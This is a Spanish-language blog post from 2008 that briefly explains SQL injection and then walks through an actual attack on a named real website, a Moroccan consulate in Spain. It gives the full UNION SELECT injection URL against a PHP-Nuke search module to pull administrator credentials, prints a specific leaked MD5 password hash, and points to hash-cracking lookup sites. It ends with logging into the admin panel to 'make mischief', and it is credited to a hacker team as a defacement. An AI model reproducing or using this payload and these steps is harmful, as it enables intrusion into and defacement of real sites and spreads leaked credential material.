Seguidores

jueves, 21 de febrero de 2008

En qué consisten los ataques por inyección de SQL

Este tipo de ataques se pueden dar sólo en sitios webs que utilicen bases de datos, por ejemplo los creados con php-nuke que utilizan MySQL,normalmente. Un atacante utilizará los enlaces del sitio web que accedan a la base de datos para cualquier tipo de consulta (mediante php, asp,jsp, etc) introduciendo en estos código alternativo para obtener más datos ó contraseñas. Incluso podría ejecutar casi cualquier tipo de instrucción SQL en la base de datos del sitio web (Delete, Drop, etc). Es más, si el motor de la base de datos es MySQL, el atacante, podríamodificar y visualizar ficheros

El hecho de que estos ataques sean tan frecuentes se debe a que no son muy complicados de realizar. Estos fallos de seguridad sólo residenen la capa de aplicación que ataca la base de datos, no dependen del Servidor web (Apache, Tomcat, IIS, etc) ni de la base de datos (Oracle,MySQL, SQL Server, etc).

Ejemplos de inyección de SQL:Un ejemplo que dare es el deface a la pagina del Consulado de Marruecos en España:

Tenemos la url

http://www.marocconsuladobcn.org/

a la cual le vamos agregar la inyeccion

modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Lo cual quedaria asi:

http://www.marocconsuladobcn.org/modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Si es vulnerable al aplicar la inyeccion nos dara el user y el pass encriptado en md5

La contraseña es esta f94ff0b6e0c902639f5c6b15f1fdd4c4, para poder desencriptar el hash vamos a la pagina

http://md5.rednoize.com/ o http://gdataonline.com/seekhash.php

Luego de tener la clave desencriptada nos dirigimos a la pagina y al final de la url le añadimos admin.php lo cual quedaria asi (http://www.marocconsuladobcn.org/admin.php)

Luego logeamos y listo hemos accedido a la base de datos mysql y hacer diabluras.

By d4n1ux >>>ECUADORIANS HACKERS TEAM<<<.


Gracias d4n1ux por tu aporte...

Moisés J. Ramos Z.
Publicado por en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)